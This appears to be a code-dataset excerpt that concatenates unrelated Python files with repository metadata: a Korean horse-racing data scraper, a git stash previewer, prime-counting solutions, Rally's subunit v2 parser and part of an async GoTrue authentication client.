data = []
for row in rows[1:]:
cols = list(row.findAll('td'))
dispatched = cols[1].getText().strip()
arrived = cols[2].getText().strip()
in_service = cols[3].getText().strip()
data.append({'unit': cols[0].getText().strip().strip('*'), 'dispatched': dispatched, 'arrived': arrived, 'in_service': in_service})
return data
while True:
print '*'
try:
todays_data = get_todays_dispatches()
#print todays_data
print table.insert(todays_data).run(conflict='update')
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
time.sleep(5)
| 56.021127 | 215 | 0.63193 |
4a1b696566f3e9b6158ddef3d52f0b73d594152b
| 12,977 |
py
|
Python
|
kra.py
|
jangbi882/KraRaceCollector
|
7598639af7b299a3995ba41a598bec57478d3742
|
[
"Apache-2.0"
] | null | null | null |
kra.py
|
jangbi882/KraRaceCollector
|
7598639af7b299a3995ba41a598bec57478d3742
|
[
"Apache-2.0"
] | null | null | null |
kra.py
|
jangbi882/KraRaceCollector
|
7598639af7b299a3995ba41a598bec57478d3742
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import urllib
import urllib2
from bs4 import BeautifulSoup
import re
import sys
import locale
import os.path
import time
os_encoding = locale.getpreferredencoding()
file_base = os.path.basename(__file__)
# Regular expression shared by all the time parsing below.
time_re = re.compile(r"^(\d+)\:(\d+).(\d+)$")
option_data = {
"contestant": {
"desc" : u"출전상세정보",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfoChulmapyo.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(6, r"(\d+\.*\d*)\((\-*\d+\.*\d*)\)", 0), (7, r"\((.*)\)(.*)", 1)]
},
"record": {
"desc" : u"전적",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfoRecord.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(2, r"(\d+)\((\d+)\/(\d+)\)", 0), (3, r"(.*)\%", 0), (4, r"(.*)\%", 0)
,(5, r"(\d+)\((\d+)\/(\d+)\)", 0), (6, r"(.*)\%", 0), (7, r"(.*)\%", 0)]
},
"course_rec": {
"desc" : u"해당거리전적",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfoDistanceRecord.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(2, r"(\d+)\((\d+)\/(\d+)\)", 0), (3, r"(.*)\%", 0), (4, r"(.*)\%", 0)
,(5, r"(\d+\:\d+.\d+).+", 0), (6, r"(\d+\:\d+.\d+).+", 0), (7, r"(\d+\:\d+.\d+).+", 0)]
},
"near10_rec": {
"desc" : u"최근10회전적",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfo10Score.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(14, r"(.+)\((.+)\)", 0)],
"skip_column_list" : [15, 16, 17]
},
}
def get_table(option, date, race_no, table_no, city):
try:
info = option_data[option]
except KeyError:
return None
if city == "seoul": i_city = 1
elif city == "jeju" : i_city = 2
elif city == "busan" : i_city = 3
else: i_city = 1
url = info["url"]
values = info["values"]
for key in values.keys():
val = values[key]
if val == '{date}': values[key] = date
elif val == '{race_no}' : values[key] = race_no
elif val == '{city}' : values[key] = i_city
    # Index of the table that holds the data; 0-based
data_table_no = info["data_table_no"]
    # List of columns to split in two; 0-based
# (col_no, pattern, def_col)
split_column_list = info["split_column_list"]
    # List of columns to ignore
if "skip_column_list" in info:
skip_column_list = info["skip_column_list"]
else:
skip_column_list = None
    # If the request headers are not set properly, the site rejects the call as abnormal.
headers = {
"Accept-Encoding" : "gzip, deflate, sdch"
,"Accept-Language" : "ko,en-US;q=0.8,en;q=0.6"
,"Upgrade-Insecure-Requests" : "1"
,"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
,"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
,"Referer" : url
        # The cookie may have changed; check whether it is still valid.
,"Cookie" : "WMONID=Nz7aZM1C3N0; NRACE_JSESSIONID=Of-NDgpECnNTA7a91UDqWQ7Nw-9Yvyy_Pp3PO1DsIFt9DAHhBzkO!-1826629772; itoken=null"
,"Connection" : "keep-alive"
}
data = urllib.urlencode(values)
try:
        # The data sometimes does not come back in one request, so re-request up to NUM_RETRY times.
NUM_RETRY = 20
for num_iter in range(NUM_RETRY):
request = urllib2.Request(url, data, headers)
response = urllib2.urlopen(request)
            # The KRA pages are euc-kr
# page = response.read().decode('euc-kr', 'ignore')
# page = response.read().decode('cp949', 'ignore')
            # But specifying the encoding here actually garbles the text.
page = response.read()
response.close()
with open("dump.html", "w") as out_file:
out_file.write(page)
            # Use lxml as the parser. Requires a separate install. Faster and more powerful.
# soup = BeautifulSoup(page, "lxml")
            # The encoding must be specified here.
            ## The lxml parser often truncated the html while parsing, so switched to html.parser
# soup = BeautifulSoup(page, "lxml", from_encoding='cp949')
soup = BeautifulSoup(page, 'html.parser', from_encoding='cp949')
######
            # Build the output file name
filename = u"{0}_{1}_{2}_race{3:02d}.txt".format(city, option, date, int(race_no))
######
            # Find the target table
try:
i_table_no = int(table_no) - 1
except Exception:
if data_table_no:
i_table_no = data_table_no
else:
i_table_no = 0
all_table = soup.find_all("table")
num_all_table = len(all_table)
if num_all_table > 0 or num_iter+1 >= NUM_RETRY:
break
print ("Retrying...")
time.sleep(2)
if i_table_no >= num_all_table:
i_table_no = num_all_table - 1
elif i_table_no < 0:
i_table_no = 0
        # Case where the data could still not be fetched after all retries
if i_table_no < 0:
print ("FAIL!!!")
return False
headers = []
rows = []
for i_table_no in range(i_table_no, (i_table_no)+1 if option != "near10_rec" else len(all_table)):
table = all_table[i_table_no]
######
tr_rows = []
            # Build the column headers
for tr in table.find_all('tr'):
ths = tr.select("th")
if len(ths) > 0:
tr_rows.append(tr)
            # Special handling for the last-10-races record
horse_name = None
if option == "near10_rec":
if len(tr_rows) > 0:
anchor = tr_rows[0].select("a")[0]
horse_name = anchor.text.encode("utf-8").strip()
del tr_rows[0]
else:
horse_name = "Unknown"
if len(headers) <= 0:
if len(tr_rows) == 1:
headers = [header.text.encode("utf-8").strip() for header in tr_rows[0].select("th")]
elif len(tr_rows) == 2:
tr1 = tr_rows[0].select("th")
tr2 = tr_rows[1].select("th")
tr2_ptr = 0
for th1 in tr1:
try:
rowspan = int(th1['rowspan'])
except KeyError:
rowspan = 1
try:
colspan = int(th1['colspan'])
except KeyError:
colspan = 1
th1_str = th1.text.encode("utf-8").strip()
if colspan == 1:
headers.append(th1_str)
else:
for i in range(tr2_ptr, tr2_ptr+colspan):
th2 = tr2[i]
th2_str = th2.text.encode("utf-8").strip()
headers.append(th1_str+"_"+th2_str)
tr2_ptr += colspan
                # Handle the ignored columns
if skip_column_list:
skip_column_list.sort(reverse=True)
for col_no in skip_column_list:
if len(headers) > col_no:
del(headers[col_no])
                # Add the columns that must be split in two
if split_column_list:
split_column_list.sort(reverse=True)
for logic in split_column_list:
col_no = logic[0]
r = re.compile(logic[1])
num_cal = r.groups
org_col_name = headers[col_no]
headers[col_no] = org_col_name+"_1"
for n in range(1, num_cal):
headers.insert(col_no+n, org_col_name+"_{}".format(n+1))
                # Special handling for the last-10-races record
if horse_name:
headers.insert(0, "마명")
######
            # Fill in the data rows
for row in table.find_all('tr'):
cols = row.find_all('td')
col_data =[re.sub(u"\s+", " ", val.text.encode("utf-8").strip().replace("\n", " ")) for val in cols]
if len(cols) <= 0:
continue
                # Remove data for the ignored columns
if skip_column_list:
for col_no in skip_column_list:
if len(col_data) > col_no:
del(col_data[col_no])
if split_column_list:
                    # Split into multiple columns or strip special characters
for logic in split_column_list:
col_no = logic[0]
r = re.compile(logic[1])
num_cal = r.groups
def_cal = logic[2]
org_val = col_data[col_no]
del col_data[col_no]
match = r.search(org_val)
if match:
vals = match.groups()
vals = reversed(vals)
for val in vals:
col_data.insert(col_no, val)
else:
for i in range(num_cal-1, -1 , -1):
if i == def_cal:
col_data.insert(col_no, org_val)
else:
col_data.insert(col_no, '')
                # Check whether any value is a time that needs converting
for i, val in enumerate(col_data):
res = time_re.search(val)
if res:
col_data[i] = str(int(res.group(1))*60 + float(res.group(2)+"."+res.group(3)))
                # Special handling for the last-10-races record
if horse_name:
col_data.insert(0, horse_name)
                # Replace empty values with NA
col_data = ["NA" if d == "" else d for d in col_data]
rows.append(col_data)
csv = ",".join(headers)
csv += "\n"
######
            # Write to file
for row in rows:
if len(row) > 0:
csv += ",".join(row)
csv += "\n"
with open(filename, "w") as out_file:
out_file.write(csv)
except urllib2.HTTPError, e:
print e.reason.args[1]
return False
except urllib2.URLError, e:
print e.reason.args[1]
return False
except Exception as e:
# print str(e)
# return False
raise e
return filename
#############
def help(add_val):
print "USAGE :\t{}{} <city> <option> <date> <race_no> [<table_no>]".format("python " if add_val==1 else "", file_base)
print "EXAMPLE :\t{}{} busan contestant 20150719 1".format("python " if add_val==1 else "", file_base)
print
print "\n== Option List =="
for cmd in option_data.keys():
print u"{}\t:\t{}".format(cmd, option_data[cmd]["desc"])
exit()
if __name__ == '__main__':
by_python = 0
if len(sys.argv) < 1:
help(by_python)
if sys.argv[0] == file_base:
by_python = 1
if len(sys.argv) < 3+by_python:
help(by_python)
city = sys.argv[1]
option = sys.argv[2]
date = sys.argv[3]
race_no = sys.argv[4]
if 5 < len(sys.argv):
table_no = sys.argv[5]
else:
table_no = None
'''
city = "busan"
option = "near10_rec"
date = "20151129"
race_no = "5"
table_no = None
'''
command_list = option_data.keys()
if option not in command_list:
print "Invalid option: {}".format(option)
help(by_python)
filename = get_table(option, date, race_no, table_no if option=="score" else None, city)
if filename:
print("Result file {} is created.".format(filename.encode(os_encoding)))
else:
print("An error occurred!")
| 33.619171 | 137 | 0.440009 |
4a1b6abc90f837cc055b7bd146d1b5643881a1e7
| 2,190 |
py
|
Python
|
git_gopher/StashPreview.py
|
derekhamilton/git-gud
|
7fd377a39796b0aa1268e7ecda6808e8e45173fe
|
[
"MIT"
] | 15 |
2019-11-13T20:59:53.000Z
|
2020-12-15T05:21:21.000Z
|
git_gopher/StashPreview.py
|
derekhamilton/git-gud
|
7fd377a39796b0aa1268e7ecda6808e8e45173fe
|
[
"MIT"
] | 50 |
2019-10-12T16:57:11.000Z
|
2019-10-27T21:03:22.000Z
|
git_gopher/StashPreview.py
|
derekhamilton/git-gud
|
7fd377a39796b0aa1268e7ecda6808e8e45173fe
|
[
"MIT"
] | 1 |
2019-11-14T03:20:21.000Z
|
2019-11-14T03:20:21.000Z
|
from os.path import isfile
from pathlib import Path
from pygments import highlight
from pygments.lexers import guess_lexer
from pygments.formatters import TerminalFormatter
from colorama import Fore, Style
import shutil
from git_gopher.GitDataGetter import GitDataGetter
class StashPreview:
def __init__(self, git_data_getter: GitDataGetter):
self._git_data_getter = git_data_getter
    def preview(self, stash_ref):
        formatter = TerminalFormatter()
        stash_contents = self._git_data_getter.get_stash_contents(stash_ref)
        if not stash_contents:
            return 'Nothing to preview for this stash.'
        # Highlight the stash contents with a lexer guessed from the text itself.
        lexer = guess_lexer(stash_contents)
        return highlight(stash_contents, lexer, formatter)
def get_horizontal_line(self) -> str:
terminal_width = shutil.get_terminal_size().columns
return "\n" + Fore.YELLOW + (u'\u2500' * terminal_width) + Style.RESET_ALL + "\n"
| 37.118644 | 89 | 0.629224 |
4a1b6add88dfcab9de5ffbebaa6bb6ff1fcaa3fd
| 1,695 |
py
|
Python
|
lc/lc204_count_primes.py
|
totoro72/pt1
|
92cffb9b36ebe2023243446e560e54200b0bd6e9
|
[
"MIT"
] | null | null | null |
lc/lc204_count_primes.py
|
totoro72/pt1
|
92cffb9b36ebe2023243446e560e54200b0bd6e9
|
[
"MIT"
] | 17 |
2020-09-04T16:35:48.000Z
|
2022-03-02T03:21:39.000Z
|
lc/lc204_count_primes.py
|
totoro72/pt1
|
92cffb9b36ebe2023243446e560e54200b0bd6e9
|
[
"MIT"
] | null | null | null |
import math
class Solution(object):
def countPrimes_slow(self, n):
"""Return the number of primes p where p < n and n >= 0"""
if n <= 2:
return 0
# if n == 2, 2 is a rpime. but not include that
primes = [2]
for k in range(3, n):
# test if any of the primes divides k
is_prime = True
for p in primes:
if k % p == 0:
is_prime = False
break
if is_prime:
primes.append(k)
return len(primes)
def countPrimes(self, n):
"""Return the number of primes p where p < n and n >= 0 (fast version)"""
if n <= 2:
return 0
# now at least [0, 1, 2, ...]
primes = [True] * n
primes[0], primes[1] = False, False
for k in range(2, n):
if primes[k]:
# knock out multiples of k
primes[k*2:n:k] = [False] * len(primes[k*2:n:k])
return primes.count(True)
def countPrimesImproved(self, n):
"""Return the number of primes p where p < n and n >= 0 (fast version)"""
if n <= 2:
return 0
# now at least [0, 1, 2, ...]
primes = [True] * n
primes[0], primes[1] = False, False
for k in range(2, math.ceil(n**0.5)): # NOTE: since we start at k*k, it's meaningless empty set when k > sqrt(n)
if primes[k]:
# knock out multiples of k
# NOTE: Improved: start from k*k because k*2 shoulda been knocked out by prime 2
primes[k*k:n:k] = [False] * len(primes[k*k:n:k])
return primes.count(True)
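# Quick sanity check (primes below 10 are 2, 3, 5, 7):
#   Solution().countPrimes(10)          # -> 4
#   Solution().countPrimesImproved(10)  # -> 4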
| 33.235294 | 121 | 0.487316 |
4a1b6c224f87f129c248e783915207f2bfc8cfdb
| 9,839 |
py
|
Python
|
rally/common/io/subunit_v2.py
|
tyzhnenko/rally
|
1d9c1e82f33686c80e49edd041fcd8d0253afdb1
|
[
"Apache-2.0"
] | 263 |
2015-04-26T16:05:34.000Z
|
2022-02-28T11:17:07.000Z
|
rally/common/io/subunit_v2.py
|
tyzhnenko/rally
|
1d9c1e82f33686c80e49edd041fcd8d0253afdb1
|
[
"Apache-2.0"
] | 19 |
2015-04-23T11:53:10.000Z
|
2019-02-20T11:23:09.000Z
|
rally/common/io/subunit_v2.py
|
tyzhnenko/rally
|
1d9c1e82f33686c80e49edd041fcd8d0253afdb1
|
[
"Apache-2.0"
] | 287 |
2015-04-23T11:28:03.000Z
|
2021-09-16T13:05:53.000Z
|
# Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from subunit import v2
from rally.common import logging
from rally.utils import encodeutils
_IGNORE_LIST = [
"subunit.parser"
]
def prepare_input_args(func):
# NOTE(andreykurilin): Variables 'runnable', 'eof', 'route_code' are not
# used in parser.
def inner(self, test_id=None, test_status=None, timestamp=None,
file_name=None, file_bytes=None, mime_type=None, test_tags=None,
runnable=True, eof=False, route_code=None):
if not test_id or test_id in _IGNORE_LIST:
return
if (test_id.startswith("setUpClass (")
or test_id.startswith("tearDown (")):
test_id = test_id[test_id.find("(") + 1:-1]
tags = _parse_test_tags(test_id)
func(self, test_id, test_status, timestamp, tags,
file_name, file_bytes, test_tags, mime_type)
return inner
def _parse_test_tags(test_id):
tags = []
if test_id.find("[") > -1:
tags = test_id.split("[")[1][:-1].split(",")
return tags
class SubunitV2StreamResult(object):
def __init__(self, expected_failures=None, skipped_tests=None, live=False,
logger_name=None):
self._tests = {}
self._expected_failures = expected_failures or {}
self._skipped_tests = skipped_tests or {}
self._live = live
self._logger = logging.getLogger(logger_name or __name__)
self._timestamps = {}
# NOTE(andreykurilin): _first_timestamp and _last_timestamp variables
# are designed to calculate the total time of tests execution.
self._first_timestamp = None
self._last_timestamp = None
# Store unknown entities and process them later.
self._unknown_entities = {}
self._is_parsed = False
@staticmethod
def _get_test_name(test_id):
return test_id.split("[")[0] if test_id.find("[") > -1 else test_id
def _check_expected_failure(self, test_id):
if (test_id in self._expected_failures
or self._get_test_name(test_id) in self._expected_failures):
if self._tests[test_id]["status"] == "fail":
self._tests[test_id]["status"] = "xfail"
if self._expected_failures[test_id]:
self._tests[test_id]["reason"] = (
self._expected_failures[test_id])
elif self._tests[test_id]["status"] == "success":
self._tests[test_id]["status"] = "uxsuccess"
def _process_skipped_tests(self):
for t_id in self._skipped_tests.copy():
if t_id not in self._tests:
status = "skip"
name = self._get_test_name(t_id)
self._tests[t_id] = {"status": status,
"name": name,
"duration": "%.3f" % 0,
"tags": _parse_test_tags(t_id)}
if self._skipped_tests[t_id]:
self._tests[t_id]["reason"] = self._skipped_tests[t_id]
status += ": %s" % self._tests[t_id]["reason"]
if self._live:
self._logger.info("{-} %s ... %s" % (name, status))
self._skipped_tests.pop(t_id)
def _parse(self):
# NOTE(andreykurilin): When whole test class is marked as skipped or
# failed, there is only one event with reason and status. So we should
# modify all tests of test class manually.
for test_id in self._unknown_entities:
known_test_ids = filter(
lambda t: t == test_id or t.startswith("%s." % test_id),
self._tests)
for t_id in known_test_ids:
if self._tests[t_id]["status"] == "init":
self._tests[t_id]["status"] = (
self._unknown_entities[test_id]["status"])
if self._unknown_entities[test_id].get("reason"):
self._tests[t_id]["reason"] = (
self._unknown_entities[test_id]["reason"])
elif self._unknown_entities[test_id].get("traceback"):
self._tests[t_id]["traceback"] = (
self._unknown_entities[test_id]["traceback"])
# decode data
for test_id in self._tests:
for file_name in ["traceback", "reason"]:
# TODO(andreykurilin): decode fields based on mime_type
if file_name in self._tests[test_id]:
self._tests[test_id][file_name] = (
encodeutils.safe_decode(
self._tests[test_id][file_name]))
self._is_parsed = True
@property
def tests(self):
if not self._is_parsed:
self._parse()
return self._tests
@property
def totals(self):
td = 0
if self._first_timestamp:
td = (self._last_timestamp - self._first_timestamp).total_seconds()
return {"tests_count": len(self.tests),
"tests_duration": "%.3f" % td,
"failures": len(self.filter_tests("fail")),
"skipped": len(self.filter_tests("skip")),
"success": len(self.filter_tests("success")),
"unexpected_success": len(self.filter_tests("uxsuccess")),
"expected_failures": len(self.filter_tests("xfail"))}
@prepare_input_args
def status(self, test_id=None, test_status=None, timestamp=None, tags=None,
file_name=None, file_bytes=None, worker=None, mime_type=None):
if timestamp:
if not self._first_timestamp:
self._first_timestamp = timestamp
self._last_timestamp = timestamp
if test_status == "exists":
self._tests[test_id] = {"status": "init",
"name": self._get_test_name(test_id),
"duration": "%.3f" % 0,
"tags": tags if tags else []}
elif test_id in self._tests:
if test_status == "inprogress":
# timestamp of test start
self._timestamps[test_id] = timestamp
self._tests[test_id]["timestamp"] = timestamp.strftime(
"%Y-%m-%dT%H:%M:%S%z")
elif test_status:
self._tests[test_id]["duration"] = "%.3f" % (
timestamp - self._timestamps[test_id]).total_seconds()
self._tests[test_id]["status"] = test_status
self._check_expected_failure(test_id)
else:
if file_name in ["traceback", "reason"]:
if file_name not in self._tests[test_id]:
self._tests[test_id][file_name] = file_bytes
else:
self._tests[test_id][file_name] += file_bytes
else:
self._unknown_entities.setdefault(test_id, {"name": test_id})
self._unknown_entities[test_id]["status"] = test_status
if file_name in ["traceback", "reason"]:
if file_name not in self._unknown_entities[test_id]:
self._unknown_entities[test_id][file_name] = file_bytes
else:
self._unknown_entities[test_id][file_name] += file_bytes
if self._skipped_tests:
self._process_skipped_tests()
if self._live and test_status not in (None, "exists", "inprogress"):
duration = ""
if test_id in self._tests:
status = self._tests[test_id]["status"]
duration = " [%ss]" % self._tests[test_id]["duration"]
else:
status = test_status
status += duration
if "xfail" in status or "skip" in status:
if test_id in self._tests:
reason = self._tests[test_id].get("reason")
else:
reason = self._unknown_entities[test_id].get("reason")
if reason:
status += ": %s" % reason
w = "{%s} " % worker.pop().split("-")[1] if worker else "-"
self._logger.info("%s ... %s"
% (w + self._get_test_name(test_id), status))
def filter_tests(self, status):
"""Filter tests by given status."""
filtered_tests = {}
for test in self.tests:
if self.tests[test]["status"] == status:
filtered_tests[test] = self.tests[test]
return filtered_tests
def parse(stream, expected_failures=None, skipped_tests=None, live=False,
logger_name=None):
results = SubunitV2StreamResult(expected_failures, skipped_tests, live,
logger_name)
v2.ByteStreamToStreamResult(stream, "non-subunit").run(results)
return results
def parse_file(filename, expected_failures=None, skipped_tests=None,
live=False, logger_name=None):
with open(filename, "rb") as stream:
return parse(stream, expected_failures, skipped_tests, live,
logger_name)
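# Illustrative usage only (not part of the original module); assumes "results.subunit"
# is a subunit v2 stream captured from a test run:
#
#   results = parse_file("results.subunit")
#   print(results.totals["tests_count"], results.totals["failures"])
#   failed = results.filter_tests("fail")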
| 39.356 | 79 | 0.565403 |
4a1b6c5f6abe2dea8b3a02740445a4d7002aa124
| 22,400 |
py
|
Python
|
venv/Lib/site-packages/gotrue/_async/client.py
|
KevinArellano94/Python-Supabase
|
98d2497419cd796e95555935239d1178e250f3ab
|
[
"MIT"
] | 13 |
2021-10-06T08:50:55.000Z
|
2022-03-29T18:21:12.000Z
|
venv/Lib/site-packages/gotrue/_async/client.py
|
KevinArellano94/Python-Supabase
|
98d2497419cd796e95555935239d1178e250f3ab
|
[
"MIT"
] | 82 |
2021-09-29T11:50:29.000Z
|
2022-03-24T07:27:33.000Z
|
venv/Lib/site-packages/gotrue/_async/client.py
|
KevinArellano94/Python-Supabase
|
98d2497419cd796e95555935239d1178e250f3ab
|
[
"MIT"
] | 4 |
2021-09-15T07:33:22.000Z
|
2022-01-13T22:53:01.000Z
|
from __future__ import annotations
from functools import partial
from json import dumps, loads
from threading import Timer
from time import time
from typing import Any, Callable, Dict, Optional, Tuple, Union, cast
from urllib.parse import parse_qs, urlparse
from uuid import uuid4
from ..constants import COOKIE_OPTIONS, DEFAULT_HEADERS, GOTRUE_URL, STORAGE_KEY
from ..exceptions import APIError
from ..types import (
AuthChangeEvent,
CookieOptions,
Provider,
Session,
Subscription,
User,
UserAttributes,
)
from .api import AsyncGoTrueAPI
from .storage import AsyncMemoryStorage, AsyncSupportedStorage
class AsyncGoTrueClient:
def __init__(
self,
*,
url: str = GOTRUE_URL,
headers: Dict[str, str] = {},
auto_refresh_token: bool = True,
persist_session: bool = True,
local_storage: AsyncSupportedStorage = AsyncMemoryStorage(),
cookie_options: CookieOptions = CookieOptions.parse_obj(COOKIE_OPTIONS),
api: Optional[AsyncGoTrueAPI] = None,
replace_default_headers: bool = False,
) -> None:
"""Create a new client
url : str
The URL of the GoTrue server.
headers : Dict[str, str]
Any additional headers to send to the GoTrue server.
auto_refresh_token : bool
Set to "true" if you want to automatically refresh the token before
expiring.
persist_session : bool
Set to "true" if you want to automatically save the user session
into local storage.
local_storage : SupportedStorage
The storage engine to use for persisting the session.
cookie_options : CookieOptions
The options for the cookie.
"""
if url.startswith("http://"):
print(
"Warning:\n\nDO NOT USE HTTP IN PRODUCTION FOR GOTRUE EVER!\n"
"GoTrue REQUIRES HTTPS to work securely."
)
self.state_change_emitters: Dict[str, Subscription] = {}
self.refresh_token_timer: Optional[Timer] = None
self.current_user: Optional[User] = None
self.current_session: Optional[Session] = None
self.auto_refresh_token = auto_refresh_token
self.persist_session = persist_session
self.local_storage = local_storage
empty_or_default_headers = {} if replace_default_headers else DEFAULT_HEADERS
args = {
"url": url,
"headers": {**empty_or_default_headers, **headers},
"cookie_options": cookie_options,
}
self.api = api or AsyncGoTrueAPI(**args)
async def __aenter__(self) -> AsyncGoTrueClient:
return self
async def __aexit__(self, exc_t, exc_v, exc_tb) -> None:
await self.close()
async def close(self) -> None:
await self.api.close()
async def init_recover(self) -> None:
"""Recover the current session from local storage."""
await self._recover_session()
await self._recover_and_refresh()
async def sign_up(
self,
*,
email: Optional[str] = None,
phone: Optional[str] = None,
password: Optional[str] = None,
redirect_to: Optional[str] = None,
data: Optional[Dict[str, Any]] = None,
) -> Union[Session, User]:
"""Creates a new user. If email and phone are provided, email will be
used and phone will be ignored.
Parameters
---------
email : Optional[str]
The user's email address.
phone : Optional[str]
The user's phone number.
password : Optional[str]
The user's password.
redirect_to : Optional[str]
A URL or mobile address to send the user to after they are confirmed.
data : Optional[Dict[str, Any]]
Optional user metadata.
Returns
-------
response : Union[Session, User]
A logged-in session if the server has "autoconfirm" ON
A user if the server has "autoconfirm" OFF
Raises
------
error : APIError
If an error occurs
"""
await self._remove_session()
if email and password:
response = await self.api.sign_up_with_email(
email=email,
password=password,
redirect_to=redirect_to,
data=data,
)
elif phone and password:
response = await self.api.sign_up_with_phone(
phone=phone, password=password, data=data
)
elif not password:
raise ValueError("Password must be defined, can't be None.")
else:
raise ValueError("Email or phone must be defined, both can't be None.")
if isinstance(response, Session):
# The user has confirmed their email or the underlying DB doesn't
# require email confirmation.
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def sign_in(
self,
*,
email: Optional[str] = None,
phone: Optional[str] = None,
password: Optional[str] = None,
refresh_token: Optional[str] = None,
provider: Optional[Provider] = None,
redirect_to: Optional[str] = None,
scopes: Optional[str] = None,
create_user: bool = False,
) -> Optional[Union[Session, str]]:
"""Log in an existing user, or login via a third-party provider.
If email and phone are provided, email will be used and phone will be ignored.
Parameters
---------
email : Optional[str]
The user's email address.
phone : Optional[str]
The user's phone number.
password : Optional[str]
The user's password.
refresh_token : Optional[str]
A valid refresh token that was returned on login.
provider : Optional[Provider]
One of the providers supported by GoTrue.
redirect_to : Optional[str]
A URL or mobile address to send the user to after they are confirmed.
scopes : Optional[str]
A space-separated list of scopes granted to the OAuth application.
Returns
-------
response : Optional[Union[Session, str]]
            If only an email is provided (without a password), None is returned
            and a magic link is sent to the email address.
            If email and password are provided, a logged-in session is returned.
            If only a phone number is provided (without a password), None is
            returned and a one-time password is sent to the phone.
            If phone and password are provided, a logged-in session is returned.
            If refresh_token is provided, a logged-in session is returned.
            If provider is provided, a redirect URL is returned.
            Otherwise, an error is raised.
Raises
------
error : APIError
If an error occurs
"""
await self._remove_session()
if email:
if password:
response = await self._handle_email_sign_in(
email=email,
password=password,
redirect_to=redirect_to,
)
else:
response = await self.api.send_magic_link_email(
email=email, create_user=create_user
)
elif phone:
if password:
response = await self._handle_phone_sign_in(
phone=phone, password=password
)
else:
response = await self.api.send_mobile_otp(
phone=phone, create_user=create_user
)
elif refresh_token:
# current_session and current_user will be updated to latest
# on _call_refresh_token using the passed refresh_token
await self._call_refresh_token(refresh_token=refresh_token)
response = self.current_session
elif provider:
response = await self._handle_provider_sign_in(
provider=provider,
redirect_to=redirect_to,
scopes=scopes,
)
else:
raise ValueError(
"Email, phone, refresh_token, or provider must be defined, "
"all can't be None."
)
return response
async def verify_otp(
self,
*,
phone: str,
token: str,
redirect_to: Optional[str] = None,
) -> Union[Session, User]:
"""Log in a user given a User supplied OTP received via mobile.
Parameters
----------
phone : str
The user's phone number.
token : str
The user's OTP.
redirect_to : Optional[str]
A URL or mobile address to send the user to after they are confirmed.
Returns
-------
response : Union[Session, User]
A logged-in session if the server has "autoconfirm" ON
A user if the server has "autoconfirm" OFF
Raises
------
error : APIError
If an error occurs
"""
await self._remove_session()
response = await self.api.verify_mobile_otp(
phone=phone,
token=token,
redirect_to=redirect_to,
)
if isinstance(response, Session):
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
def user(self) -> Optional[User]:
"""Returns the user data, if there is a logged in user."""
return self.current_user
def session(self) -> Optional[Session]:
"""Returns the session data, if there is an active session."""
return self.current_session
async def refresh_session(self) -> Session:
"""Force refreshes the session.
        Force refreshes the session, including the user data, in case it was
        updated in a different session.
"""
if not self.current_session:
raise ValueError("Not logged in.")
return await self._call_refresh_token()
async def update(self, *, attributes: UserAttributes) -> User:
"""Updates user data, if there is a logged in user.
Parameters
----------
attributes : UserAttributes
The attributes to update.
Returns
-------
response : User
The updated user data.
Raises
------
error : APIError
If an error occurs
"""
if not self.current_session:
raise ValueError("Not logged in.")
response = await self.api.update_user(
jwt=self.current_session.access_token,
attributes=attributes,
)
self.current_session.user = response
await self._save_session(session=self.current_session)
self._notify_all_subscribers(event=AuthChangeEvent.USER_UPDATED)
return response
async def set_session(self, *, refresh_token: str) -> Session:
"""Sets the session data from refresh_token and returns current Session
Parameters
----------
refresh_token : str
            A valid refresh token that was returned on login.
Returns
-------
response : Session
A logged-in session
Raises
------
error : APIError
If an error occurs
"""
response = await self.api.refresh_access_token(refresh_token=refresh_token)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def set_auth(self, *, access_token: str) -> Session:
"""Overrides the JWT on the current client. The JWT will then be sent in
all subsequent network requests.
Parameters
----------
access_token : str
A JWT token
Returns
-------
response : Session
A logged-in session
Raises
------
error : APIError
If an error occurs
"""
session = Session(
access_token=access_token,
token_type="bearer",
user=None,
expires_in=None,
expires_at=None,
refresh_token=None,
provider_token=None,
)
if self.current_session:
session.expires_in = self.current_session.expires_in
session.expires_at = self.current_session.expires_at
session.refresh_token = self.current_session.refresh_token
session.provider_token = self.current_session.provider_token
await self._save_session(session=session)
return session
async def get_session_from_url(
self,
*,
url: str,
store_session: bool = False,
) -> Session:
"""Gets the session data from a URL string.
Parameters
----------
url : str
The URL string.
store_session : bool
            If True, persist the session to local storage.
Returns
-------
response : Session
A logged-in session
Raises
------
error : APIError
